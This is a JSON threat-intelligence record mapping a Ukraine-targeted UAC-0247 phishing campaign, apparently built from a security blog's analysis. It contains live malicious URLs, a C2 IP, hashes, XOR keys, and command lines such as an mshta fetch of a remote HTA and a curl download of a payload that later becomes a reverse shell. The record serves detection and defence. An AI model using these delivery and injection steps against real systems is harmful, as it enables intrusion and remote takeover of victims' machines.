{
  "iim_version": "1.1",
  "chain_id": "uac-0247-ukrvarta-fpv-dopomoga-2026-03",
  "title": "UAC-0247 UkrVarta FPV Lure to RuntimeBroker Injection and Reverse Shell",
  "description": "Campaign chain for a Ukraine-focused lure targeting FPV/UAV-related audiences. The flow starts with a humanitarian-aid themed archive/LNK and HTA delivery layer on ukrvarta.online, moves through external JavaScript and updater.txt payload staging, persists through a scheduled task named OneDriveUpdater, injects a decoded shellcode stage into RuntimeBroker.exe, unpacks EncryptedReverseShell.exe, and communicates with 109.237.97.4:8443.",
  "actor_id": "UAC-0247",
  "observed_at": "2026-03-24T00:00:00Z",
  "confidence": "confirmed",
  "needs_review": false,
  "x_campaign": "UkrVarta FPV operators lure",
  "x_source_report": "Synaptic Security Blog: UAC-0247 Malware Targeting FPV operators",
  "x_scope_note": "IIM models the infrastructure and delivery graph. Host execution details such as ActiveX, scheduled tasks, direct syscalls, process injection, XOR encoding and LZNT1 compression are preserved as evidence and ATT&CK annotations, but are not treated as primary IIM roles.",
  "x_key_findings": [
    "Initial archive contains a Ukrainian humanitarian-aid themed LNK that invokes mshta against ukrvarta.online/dopomoga/dopomoga.hta.",
    "The delivery server applies geofenced delivery behavior and exposed directory indexes under /dopomoga and /conference.",
    "The newer HTA delegates its execution logic to /dopomoga/script.js, which downloads /dopomoga/updater.txt and saves it directly as OneDriveUpdater.exe.",
    "Older variants used /conference/updater.txt and XOR decoding with key 66 75 63 6b before writing the same updater payload.",
    "updater.exe injects decoded shellcode into RuntimeBroker.exe and the nested loader unpacks EncryptedReverseShell.exe.",
    "The final payload communicates with 109.237.97.4:8443 using a simple XOR-protected command channel."
  ],
  "entities": [
    {
      "id": "e01_initial_zip",
      "type": "file",
      "value": "UkrVarta humanitarian-aid themed ZIP archive",
      "observed_at": "2026-03-24T00:00:00Z",
      "source": "Synaptic Security Blog",
      "evidence": [
        "Archive contained LNK named 'Форма заявки на гуманітарну допомогу фонд УкрВарта'"
      ],
      "x_lure_theme": "UkrVarta Foundation humanitarian aid application form",
      "x_targeting": "Ukraine / FPV and UAV operators or interested parties"
    },
    {
      "id": "e02_lnk_form",
      "type": "file",
      "value": "Форма заявки на гуманітарну допомогу фонд УкрВарта.lnk",
      "observed_at": "2026-03-24T00:00:00Z",
      "source": "Synaptic Security Blog",
      "evidence": [
        "LNK command launches mshta.exe with https://ukrvarta.online/dopomoga/dopomoga.hta"
      ],
      "x_relative_path": "..\\..\\Windows\\System32\\mshta.exe",
      "x_execution_target": "https://ukrvarta.online/dopomoga/dopomoga.hta"
    },
    {
      "id": "e03_ukrvarta_domain",
      "type": "domain",
      "value": "ukrvarta.online",
      "observed_at": "2026-03-24T00:00:00Z",
      "source": "Synaptic Security Blog",
      "evidence": [
        "Delivery host for dopomoga, conference and WebDAV paths"
      ],
      "x_lure_branding": "UkrVarta",
      "x_observed_paths": [
        "/dopomoga/",
        "/conference/",
        "/davwwwroot"
      ]
    },
    {
      "id": "e04_dopomoga_hta",
      "type": "url",
      "value": "https://ukrvarta.online/dopomoga/dopomoga.hta",
      "observed_at": "2026-03-24T00:00:00Z",
      "source": "Synaptic Security Blog",
      "evidence": [
        "New HTA is mostly a visual stub and loads external JavaScript from /dopomoga/script.js"
      ],
      "x_variant": "new",
      "x_ui_behavior": "Displays lure UI and fake confirmation popup"
    },
    {
      "id": "e05_dopomoga_script_js",
      "type": "url",
      "value": "https://ukrvarta.online/dopomoga/script.js",
      "observed_at": "2026-03-24T00:00:00Z",
      "source": "Synaptic Security Blog",
      "evidence": [
        "External obfuscated JavaScript instantiates WScript.Shell and Scripting.FileSystemObject via ActiveX"
      ],
      "x_stage_behavior": [
        "Creates %LOCALAPPDATA%\\OneDriveUpdater",
        "Downloads updater.txt via cmd /c curl",
        "Writes OneDriveUpdater.exe",
        "Creates scheduled task named OneDriveUpdater with /f"
      ]
    },
    {
      "id": "e06_dopomoga_updater_url",
      "type": "url",
      "value": "https://ukrvarta.online/dopomoga/updater.txt",
      "observed_at": "2026-03-24T00:00:00Z",
      "source": "Synaptic Security Blog",
      "evidence": [
        "New script downloads updater.txt directly and stores it as %LOCALAPPDATA%\\OneDriveUpdater\\OneDriveUpdater.exe"
      ],
      "x_saved_as": "%LOCALAPPDATA%\\OneDriveUpdater\\OneDriveUpdater.exe",
      "x_delivery_change": "Direct file save instead of PowerShell EncodedCommand and XOR decode"
    },
    {
      "id": "e07_conference_updater_url",
      "type": "url",
      "value": "https://ukrvarta.online/conference/updater.txt",
      "observed_at": "2026-03-24T00:00:00Z",
      "source": "Synaptic Security Blog",
      "evidence": [
        "Older HTA/PowerShell path downloaded this URL and XOR-decoded it with key 66 75 63 6b"
      ],
      "x_variant": "old",
      "x_xor_key_hex": "66 75 63 6b",
      "x_xor_key_ascii": "fuck"
    },
    {
      "id": "e08_conference_hta",
      "type": "url",
      "value": "https://ukrvarta.online/conference/conference.hta",
      "observed_at": "2026-03-24T00:00:00Z",
      "source": "Synaptic Security Blog",
      "evidence": [
        "Conference-themed HTA presented as a legitimate FPV/UAV conference document and used the same dropper logic"
      ],
      "x_lure_theme": "Closed conference for UAV and EW manufacturers"
    },
    {
      "id": "e09_webdav_searchms",
      "type": "url",
      "value": "search-ms:query=lnk&crumb=location:\\\\ukrvarta.online@8080\\davwwwroot",
      "observed_at": "2026-03-24T00:00:00Z",
      "source": "Synaptic Security Blog",
      "evidence": [
        "conference2026_webdavroot.html redirects to a Windows search-ms URI pointing at a WebDAV share and filtering for LNK files"
      ],
      "x_delivery_mechanism": "Windows search-ms to WebDAV",
      "x_webdav_host": "ukrvarta.online:8080/davwwwroot"
    },
    {
      "id": "e10_updater_sha256",
      "type": "hash",
      "value": "c06cc6122b798f88a05a088bfed39594af86ba714da89fec5ca62d7119782df9",
      "observed_at": "2026-03-24T00:00:00Z",
      "source": "Static analysis of updater.exe",
      "evidence": [
        "PE32+ x86-64 GUI executable, size 222056 bytes, MD5 44fe18a23d6d2ca53a7234a934f438db",
        "EntryPoint VA 0x1400020a4, malware main around 0x140001a60"
      ],
      "x_filename": "updater.exe",
      "x_md5": "44fe18a23d6d2ca53a7234a934f438db",
      "x_pe_timestamp": "2026-03-14T20:42:39Z",
      "x_image_base": "0x140000000",
      "x_entrypoint_va": "0x1400020a4",
      "x_main_va": "0x140001a60",
      "x_stage_behavior": [
        "Resolves NTDLL exports by CRC32 hash",
        "Extracts syscall numbers from NTDLL stubs",
        "Targets RuntimeBroker.exe",
        "Allocates remote memory, writes decoded shellcode, switches protection from PAGE_NOACCESS to PAGE_EXECUTE_READ, starts remote thread"
      ]
    },
    {
      "id": "e11_runtimebroker_target",
      "type": "file",
      "value": "RuntimeBroker.exe",
      "observed_at": "2026-03-24T00:00:00Z",
      "source": "Static analysis of updater.exe",
      "evidence": [
        "Outer loader searches for RuntimeBroker.exe before remote injection"
      ],
      "x_role_in_host_chain": "remote process injection target"
    },
    {
      "id": "e12_shellcode_sha256",
      "type": "hash",
      "value": "c8117fdbc81dfae804ad03eb4c7a38017851c941ecfebb06f129c7923c0d3d8d",
      "observed_at": "2026-03-24T00:00:00Z",
      "source": "Static extraction from updater.exe .data blob",
      "evidence": [
        "Encoded blob VA 0x14001a000, raw offset 0x18000, size 0x19321, XOR key 0x66",
        "Decoded first bytes: 57 31 c0 b9 0a 00 00 00"
      ],
      "x_md5": "c65535199517248fea9a4a34050ca474",
      "x_outer_xor_key": "0x66",
      "x_blob_size": "0x19321",
      "x_nested_loader": [
        "Resolves LdrLoadDll, NtAllocateVirtualMemory, NtProtectVirtualMemory, NtFreeVirtualMemory",
        "Parses embedded package format",
        "Decrypts second package and decompresses it via RtlDecompressBuffer with LZNT1 format 0x2"
      ]
    },
    {
      "id": "e13_final_payload_sha256",
      "type": "hash",
      "value": "b1d765f50f5c53702658b7a59a9bd05cfb042ea6b2d150191a84c53d373b9e4a",
      "observed_at": "2026-03-24T00:00:00Z",
      "source": "Static extraction from nested shellcode package",
      "evidence": [
        "Final PE internal name EncryptedReverseShell.exe",
        "PE32+ x86-64 GUI executable, size 0x20800, MD5 8b2a9635f729c68cddedc00c70c8b4f2",
        "PDB path: C:\\Users\\user\\source\\repos\\EncryptedReverseShell\\x64\\Release\\EncryptedReverseShell.pdb"
      ],
      "x_filename": "EncryptedReverseShell.exe",
      "x_md5": "8b2a9635f729c68cddedc00c70c8b4f2",
      "x_entrypoint_va": "0x140001978",
      "x_reverse_shell_routine_va": "0x140001070",
      "x_c2_message_xor_key_hex": "01 01 02 03 74 15 04 ff ee"
    },
    {
      "id": "e14_c2_ip",
      "type": "ip",
      "value": "109.237.97.4",
      "observed_at": "2026-03-24T00:00:00Z",
      "source": "Static analysis of final payload and campaign infrastructure",
      "evidence": [
        "Final payload connects to 109.237.97.4:8443",
        "Same IP was observed as the server behind ukrvarta.online delivery infrastructure"
      ],
      "x_port": 8443,
      "x_socket_flow": [
        "WSAStartup",
        "socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)",
        "connect(109.237.97.4:8443)",
        "send encrypted Connected! beacon",
        "receive encrypted command length and command",
        "execute via cmd /C %s",
        "encrypt and return command output"
      ],
      "x_hosting_note": "Observed as a Nuxt.cloud-hosted server in the campaign analysis"
    }
  ],
  "chain": [
    {
      "entity_id": "e01_initial_zip",
      "role": "entry",
      "techniques": [
        "IIM-T024"
      ],
      "role_confidence": "confirmed",
      "technique_confidence": "confirmed"
    },
    {
      "entity_id": "e02_lnk_form",
      "role": "entry",
      "techniques": [
        "IIM-T024"
      ],
      "role_confidence": "confirmed",
      "technique_confidence": "confirmed"
    },
    {
      "entity_id": "e03_ukrvarta_domain",
      "role": "staging",
      "techniques": [
        "IIM-T002",
        "IIM-T019",
        "IIM-T026"
      ],
      "role_confidence": "confirmed",
      "technique_confidence": "confirmed",
      "review_notes": "IIM-T002 is based on observed Nuxt.cloud hosting; IIM-T019 is based on geofenced payload delivery; IIM-T026 is based on exposed directory indexes under delivery paths."
    },
    {
      "entity_id": "e04_dopomoga_hta",
      "role": "staging",
      "techniques": [
        "IIM-T019"
      ],
      "role_confidence": "confirmed",
      "technique_confidence": "confirmed"
    },
    {
      "entity_id": "e05_dopomoga_script_js",
      "role": "staging",
      "techniques": [],
      "role_confidence": "confirmed",
      "technique_confidence": "confirmed"
    },
    {
      "entity_id": "e06_dopomoga_updater_url",
      "role": "payload",
      "techniques": [
        "IIM-T019"
      ],
      "role_confidence": "confirmed",
      "technique_confidence": "confirmed"
    },
    {
      "entity_id": "e07_conference_updater_url",
      "role": "payload",
      "techniques": [],
      "role_confidence": "confirmed",
      "technique_confidence": "confirmed",
      "review_notes": "Older staging path; included to preserve infrastructure evolution from /conference/ to /dopomoga/."
    },
    {
      "entity_id": "e08_conference_hta",
      "role": "staging",
      "techniques": [],
      "role_confidence": "confirmed",
      "technique_confidence": "confirmed"
    },
    {
      "entity_id": "e09_webdav_searchms",
      "role": "redirector",
      "techniques": [
        "IIM-T015"
      ],
      "role_confidence": "confirmed",
      "technique_confidence": "confirmed",
      "review_notes": "Client-side redirect through search-ms into WebDAV-backed LNK discovery."
    },
    {
      "entity_id": "e10_updater_sha256",
      "role": "payload",
      "techniques": [],
      "role_confidence": "confirmed",
      "technique_confidence": "confirmed"
    },
    {
      "entity_id": "e11_runtimebroker_target",
      "role": "payload",
      "techniques": [],
      "role_confidence": "confirmed",
      "technique_confidence": "confirmed",
      "review_notes": "Host-side injection target preserved as payload evidence, not as a standalone infrastructure role."
    },
    {
      "entity_id": "e12_shellcode_sha256",
      "role": "payload",
      "techniques": [],
      "role_confidence": "confirmed",
      "technique_confidence": "confirmed"
    },
    {
      "entity_id": "e13_final_payload_sha256",
      "role": "payload",
      "techniques": [],
      "role_confidence": "confirmed",
      "technique_confidence": "confirmed"
    },
    {
      "entity_id": "e14_c2_ip",
      "role": "c2",
      "techniques": [
        "IIM-T002"
      ],
      "role_confidence": "confirmed",
      "technique_confidence": "likely",
      "review_notes": "Same IP appears to support delivery and final C2. Treat as infrastructure reuse across staging and C2."
    }
  ],
  "relations": [
    {
      "from": "e01_initial_zip",
      "to": "e02_lnk_form",
      "type": "drops",
      "sequence_order": 0,
      "observed_at": "2026-03-24T00:00:00Z",
      "confidence": "confirmed"
    },
    {
      "from": "e02_lnk_form",
      "to": "e04_dopomoga_hta",
      "type": "execute",
      "sequence_order": 1,
      "observed_at": "2026-03-24T00:00:00Z",
      "confidence": "confirmed",
      "x_execution": "mshta.exe https://ukrvarta.online/dopomoga/dopomoga.hta"
    },
    {
      "from": "e03_ukrvarta_domain",
      "to": "e14_c2_ip",
      "type": "resolves-to",
      "sequence_order": 2,
      "observed_at": "2026-03-24T00:00:00Z",
      "confidence": "confirmed"
    },
    {
      "from": "e04_dopomoga_hta",
      "to": "e05_dopomoga_script_js",
      "type": "references",
      "sequence_order": 3,
      "observed_at": "2026-03-24T00:00:00Z",
      "confidence": "confirmed"
    },
    {
      "from": "e05_dopomoga_script_js",
      "to": "e06_dopomoga_updater_url",
      "type": "download",
      "sequence_order": 4,
      "observed_at": "2026-03-24T00:00:00Z",
      "confidence": "confirmed",
      "x_command_family": "cmd /c curl"
    },
    {
      "from": "e06_dopomoga_updater_url",
      "to": "e10_updater_sha256",
      "type": "drops",
      "sequence_order": 5,
      "observed_at": "2026-03-24T00:00:00Z",
      "confidence": "confirmed",
      "x_saved_as": "%LOCALAPPDATA%\\OneDriveUpdater\\OneDriveUpdater.exe"
    },
    {
      "from": "e08_conference_hta",
      "to": "e07_conference_updater_url",
      "type": "download",
      "sequence_order": 6,
      "observed_at": "2026-03-24T00:00:00Z",
      "confidence": "confirmed",
      "x_variant": "older conference path"
    },
    {
      "from": "e07_conference_updater_url",
      "to": "e10_updater_sha256",
      "type": "drops",
      "sequence_order": 7,
      "observed_at": "2026-03-24T00:00:00Z",
      "confidence": "confirmed",
      "x_transform": "XOR decode with key 66 75 63 6b before writing executable"
    },
    {
      "from": "e09_webdav_searchms",
      "to": "e02_lnk_form",
      "type": "references",
      "sequence_order": 8,
      "observed_at": "2026-03-24T00:00:00Z",
      "confidence": "likely",
      "x_variant": "alternate WebDAV/search-ms entry path"
    },
    {
      "from": "e10_updater_sha256",
      "to": "e11_runtimebroker_target",
      "type": "execute",
      "sequence_order": 9,
      "observed_at": "2026-03-24T00:00:00Z",
      "confidence": "confirmed",
      "x_behavior": "Opens RuntimeBroker.exe process and injects decoded shellcode"
    },
    {
      "from": "e10_updater_sha256",
      "to": "e12_shellcode_sha256",
      "type": "drops",
      "sequence_order": 10,
      "observed_at": "2026-03-24T00:00:00Z",
      "confidence": "confirmed",
      "x_transform": "Decode .data blob with XOR key 0x66"
    },
    {
      "from": "e12_shellcode_sha256",
      "to": "e13_final_payload_sha256",
      "type": "drops",
      "sequence_order": 11,
      "observed_at": "2026-03-24T00:00:00Z",
      "confidence": "confirmed",
      "x_transform": "Nested package XOR decrypt and LZNT1 decompress via RtlDecompressBuffer format 0x2"
    },
    {
      "from": "e13_final_payload_sha256",
      "to": "e14_c2_ip",
      "type": "communicates-with",
      "sequence_order": 12,
      "observed_at": "2026-03-24T00:00:00Z",
      "confidence": "confirmed",
      "x_port": 8443,
      "x_protocol": "TCP reverse shell with simple XOR-protected command and output channel"
    }
  ],
  "attack_annotations": [
    {
      "technique_id": "T1204.002",
      "name": "User Execution: Malicious File",
      "tactic": "Execution",
      "comment": "Victim opens LNK/HTA lure content themed around Ukrainian humanitarian aid or FPV/UAV activity."
    },
    {
      "technique_id": "T1218.005",
      "name": "System Binary Proxy Execution: Mshta",
      "tactic": "Defense Evasion / Execution",
      "comment": "LNK invokes mshta.exe to load the hosted HTA."
    },
    {
      "technique_id": "T1059.007",
      "name": "Command and Scripting Interpreter: JavaScript",
      "tactic": "Execution",
      "comment": "HTA loads obfuscated JavaScript that uses ActiveX objects."
    },
    {
      "technique_id": "T1105",
      "name": "Ingress Tool Transfer",
      "tactic": "Command and Control",
      "comment": "JavaScript downloads updater.txt and writes it as OneDriveUpdater.exe."
    },
    {
      "technique_id": "T1053.005",
      "name": "Scheduled Task/Job: Scheduled Task",
      "tactic": "Persistence / Execution",
      "comment": "Dropper creates a scheduled task named OneDriveUpdater; the newer variant passes /f to overwrite any existing task of that name."
    },
    {
      "technique_id": "T1055",
      "name": "Process Injection",
      "tactic": "Defense Evasion / Privilege Escalation",
      "comment": "updater.exe injects decoded shellcode into RuntimeBroker.exe using direct syscall workflow."
    },
    {
      "technique_id": "T1027",
      "name": "Obfuscated Files or Information",
      "tactic": "Defense Evasion",
      "comment": "Outer payload blob uses XOR 0x66; older delivery used XOR key 66 75 63 6b; nested package uses XOR plus LZNT1 compression."
    },
    {
      "technique_id": "T1059.003",
      "name": "Command and Scripting Interpreter: Windows Command Shell",
      "tactic": "Execution",
      "comment": "Final reverse shell executes received commands via cmd /C %s."
    },
    {
      "technique_id": "T1571",
      "name": "Non-Standard Port",
      "tactic": "Command and Control",
      "comment": "Final payload connects to 109.237.97.4:8443."
    }
  ]
}